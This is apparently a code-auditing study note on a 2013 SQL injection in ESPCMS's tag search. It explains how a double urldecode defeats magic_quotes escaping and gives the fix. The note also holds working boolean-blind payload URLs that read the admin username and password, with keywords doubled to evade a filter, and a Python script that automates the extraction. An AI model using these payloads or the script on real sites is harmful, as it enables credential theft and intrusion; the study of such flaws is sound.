While learning code auditing I worked through the espcms SQL injection that seay found in 2013. Notes below:
The problem function is in_taglist() in interface/search.php:
function in_taglist() {
    parent::start_pagetemplate();
    include_once admin_ROOT . 'public/class_pagebotton.php';
    $page = $this->fun->accept('page', 'G');
    $page = isset($page) ? intval($page) : 1;
    $lng = (admin_LNG == 'big5') ? $this->CON['is_lancode'] : admin_LNG;
    // tagkey comes from GET or POST ('R') and is URL-decoded a second time here,
    // after accept() has already applied the GPC escaping
    $tagkey = urldecode($this->fun->accept('tagkey', 'R'));
    $db_where = ' WHERE lng=\'' . $lng . '\' AND isclass=1';
    if (empty($tagkey)) {
        $linkURL = $_SERVER['HTTP_REFERER'];
        $this->callmessage($this->lng['search_err'], $linkURL, $this->lng['gobackbotton']);
    }
    if (!empty($tagkey)) {
        // the decoded value is concatenated straight into the WHERE clause, inside a quoted string
        $db_where.=" AND FIND_IN_SET('$tagkey',tags)";
    }
    $pagemax = 20;
    $pagesylte = 1;
    $templatesDIR = $this->get_templatesdir('article');
    $templatefilename = $lng . '/' . $templatesDIR . '/search';
    $db_table = db_prefix . 'document';
    // first query that carries the tainted WHERE clause (row count for the pager)
    $countnum = $this->db_numrows($db_table, $db_where);
    if ($countnum > 0) {
        $numpage = ceil($countnum / $pagemax);
    } else {
        $numpage = 1;
    }
    // second query with the same tainted clause
    $sql = "SELECT did,lng,pid,mid,aid,tid,sid,fgid,linkdid,isclass,islink,ishtml,ismess,isorder,purview,recommend,tsn,title,longtitle,
color,author,source,pic,link,oprice,bprice,click,description,keywords,addtime,template,filename,filepath FROM $db_table $db_where LIMIT 0,$pagemax";
    $this->htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON['file_fileex'], 5, $this->lng['pagebotton'], $this->lng['gopageurl'], $this->CON['is_rewrite']);
    $sql = $this->htmlpage->PageSQL('pid,did', 'down');
    $rs = $this->db->query($sql);
    while ($rsList = $this->db->fetch_assoc($rs)) {
        $rsList['typename'] = $this->get_type($rsList['tid'], 'typename');
        $rsList['link'] = $this->get_link('doc', $rsList, admin_LNG);
        $rsList['buylink'] = $this->get_link('buylink', $rsList, admin_LNG);
        $rsList['enqlink'] = $this->get_link('enqlink', $rsList, admin_LNG);
        // the HTML markup wrapped around the title and the keyword on the next two lines
        // was stripped when this post was extracted; $keyname and $keyword are not set
        // anywhere in this function in the original either
        $rsList['ctitle'] = empty($rsList['color']) ? $rsList['title'] : "" . $rsList['title'] . "";
        $rsList[$keyname] = str_ireplace($keyword, '' . $keyword . '', $rsList[$keyname]);
        $array[] = $rsList;
    }
    $this->pagetemplate->assign('pagetext', $this->htmlpage->PageStat($this->lng['pagetext']));
    $this->pagetemplate->assign('pagebotton', $this->htmlpage->PageList());
    $this->pagetemplate->assign('pagenu', $this->htmlpage->Bottonstyle(false));
    $this->pagetemplate->assign('pagese', $this->htmlpage->pageSelect());
    $this->pagetemplate->assign('pagevt', $this->htmlpage->Prevbotton());
    $this->pagetemplate->assign('array', $array);
    $this->pagetemplate->assign('path', 'search');
    unset($array, $typeread, $modelview, $LANPACK, $this->lng);
    $this->pagetemplate->display($templatefilename, 'search', false, $filename, admin_LNG);
}
The lines that matter:
$tagkey = urldecode($this->fun->accept('tagkey', 'R'));
$db_where.=" AND FIND_IN_SET('$tagkey',tags)";
$sql = "SELECT did,lng,pid,mid,aid,tid,sid,fgid,linkdid,isclass,islink,ishtml,ismess,isorder,purview,recommend,tsn,title,longtitle,
color,author,source,pic,link,oprice,bprice,click,description,keywords,addtime,template,filename,filepath FROM $db_table $db_where LIMIT 0,$pagemax";
$tagkey is passed through urldecode() after accept() has already applied the GPC escaping, and that is what defeats magic_quotes_gpc: PHP decodes the query string once, so tagkey=a%2527 arrives in $_GET as a%27, a string with no quote for addslashes() to escape; the second decode inside in_taglist() then turns %27 into a literal ' that is concatenated into $db_where. That clause is used twice, first by db_numrows() for the pager count and then in the SELECT above, so the injection already fires on the COUNT query before the document list is built. The general rule: any decoding performed after the escaping step re-opens the injection, so the value has to be escaped (or bound as a parameter) after the last decode; here that means dropping the redundant urldecode() of already-decoded request data, or escaping $tagkey after it.
Vulnerability test URL (a double-encoded single quote, %2527, reaches the query unescaped and breaks it): http://localhost/espcms/index.php?ac=search&at=taglist&tagkey=a%2527
Guess the username length:
http://localhost/espcms/index.php?ac=search&at=taglist&tagkey=cnseay.com%2527,tags) or did>1 and 1=(seselectlect length(username) frfromom espcms_admin_member limit 1) limit 1-- by seay
Brute-force the username and password (the payload shown targets username; password works the same way with the column swapped):
http://localhost/espcms/index.php?ac=search&at=taglist&tagkey=cnseay.com%2527,tags) or did>1 and 97=ascii((seselectlect mid(username,1,1) frfromom espcms_admin_member limit 1)) limit 1-- by seay
How the payload is shaped: cnseay.com%2527 closes the string inside FIND_IN_SET, ,tags) closes the function call, or did>1 and <condition> makes the WHERE clause true for existing rows only while the condition holds, limit 1 keeps the statement valid, and the trailing -- by seay is a SQL comment that swallows the ',tags) and LIMIT 0,20 the code appends. The doubled keywords seselectlect and frfromom are there to survive a filter that strips select and from once: after a single pass they collapse into the real keywords. The result is a boolean-based blind injection: when the condition is true the tag page lists documents, otherwise it reports no results, and the comparison value (1 in the length probe, 97 = 'a' in the character probe) is stepped until the page flips.
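Added example (Python, not part of the original post and not ESPCMS code) covering both the GPC bypass explained above and the two blind payloads: it models the request path (PHP's single decode of the query string, addslashes() from magic_quotes_gpc, a keyword filter, then the urldecode() in in_taglist()), builds the same COUNT query that db_numrows() runs, and executes it in SQLite with FIND_IN_SET, ASCII and MID registered as user functions so the injected SQL actually runs. It then automates the manual length and character guessing with a binary search over ascii(mid(username,i,1)). The one-pass keyword filter (inferred from the doubled seselectlect/frfromom, not verified against ESPCMS source), the table rows and the admin username are constructed assumptions.

```python
"""Model of the espcms in_taglist() injection path. Added example, not ESPCMS code.
Everything marked ASSUMPTION is constructed for the demonstration."""
import sqlite3
import urllib.parse

# ASSUMPTION: the filter the doubled 'seselectlect'/'frfromom' are built to
# survive, modelled as a one-pass removal of the keywords.
FILTERED_KEYWORDS = ("select", "from")


def addslashes(s):
    """PHP addslashes(), which magic_quotes_gpc applies to request data."""
    return (s.replace("\\", "\\\\").replace("'", "\\'")
             .replace('"', '\\"').replace("\0", "\\0"))


def keyword_filter(s):
    """One-pass strip: 'seselectlect' -> 'select', 'frfromom' -> 'from'."""
    for kw in FILTERED_KEYWORDS:
        s = s.replace(kw, "")
    return s


def server_side_tagkey(query_value):
    """Value of $tagkey inside in_taglist() for ?tagkey=<query_value>."""
    v = urllib.parse.unquote(query_value)  # PHP decodes the query string once
    v = addslashes(v)                      # magic_quotes_gpc escaping
    v = keyword_filter(v)                  # ASSUMPTION: accept() keyword filter
    return urllib.parse.unquote(v)         # the explicit urldecode() in in_taglist()


def build_count_sql(tagkey, lng="cn"):
    """Same concatenation as in_taglist(); db_numrows() runs this first."""
    where = " WHERE lng='%s' AND isclass=1" % lng
    if tagkey:
        where += " AND FIND_IN_SET('%s',tags)" % tagkey
    return "SELECT COUNT(*) FROM espcms_document" + where


def make_db():
    """SQLite stand-in for MySQL with the three functions the payloads use."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("FIND_IN_SET", 2,
                         lambda needle, hay: int(needle in (hay or "").split(",")))
    conn.create_function("ASCII", 1, lambda s: ord(s[0]) if s else 0)
    conn.create_function("MID", 3, lambda s, start, n: (s or "")[start - 1:start - 1 + n])
    conn.executescript("""
        CREATE TABLE espcms_document(did INTEGER, lng TEXT, isclass INTEGER, tags TEXT);
        INSERT INTO espcms_document VALUES (1,'cn',1,'news'),(2,'cn',1,'news,tech'),(3,'cn',1,'');
        CREATE TABLE espcms_admin_member(username TEXT, password TEXT);
        INSERT INTO espcms_admin_member VALUES ('admin','constructed-hash');  -- ASSUMPTION
    """)
    return conn


def run_count(conn, query_value):
    """Row count the page would see, or None when the SQL is broken (error page)."""
    try:
        return conn.execute(build_count_sql(server_side_tagkey(query_value))).fetchone()[0]
    except sqlite3.Error:
        return None


def blind_payload(condition):
    """Shape of the two original URLs: close FIND_IN_SET('...',tags), OR in a
    condition restricted to rows with did>1, then comment out the rest."""
    return "cnseay.com%2527,tags) or did>1 and " + condition + " limit 1-- by seay"


def extract_username(conn, max_len=32):
    """Automates the manual steps: length first, then each character by binary
    search over ascii(mid(username,i,1)) instead of trying 97, 98, ... by hand."""
    oracle = lambda cond: (run_count(conn, blind_payload(cond)) or 0) > 0
    length = next((n for n in range(1, max_len + 1) if oracle(
        "%d=(seselectlect length(username) frfromom espcms_admin_member limit 1)" % n)), 0)
    chars = []
    for pos in range(1, length + 1):
        lo, hi = 32, 126  # printable ASCII range
        while lo < hi:
            guess = (lo + hi) // 2
            if oracle("ascii((seselectlect mid(username,%d,1) frfromom "
                      "espcms_admin_member limit 1))>%d" % (pos, guess)):
                lo = guess + 1
            else:
                hi = guess
        chars.append(chr(lo))
    return "".join(chars)


if __name__ == "__main__":
    print(repr(server_side_tagkey("a%27")), repr(server_side_tagkey("a%2527")))
    db = make_db()
    print(run_count(db, "a%2527"))   # None: the quote broke the query
    print(extract_username(db))
```

server_side_tagkey("a%27") comes out as a\' (the escaping holds) while "a%2527" comes out as a bare a', which is the whole bug in one comparison; the extraction loop needs about seven requests per character instead of up to 95, and the same loop serves the password column by swapping the column name in the two probe strings.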
I only recently started with code auditing, and reading all this makes my eyes hurt.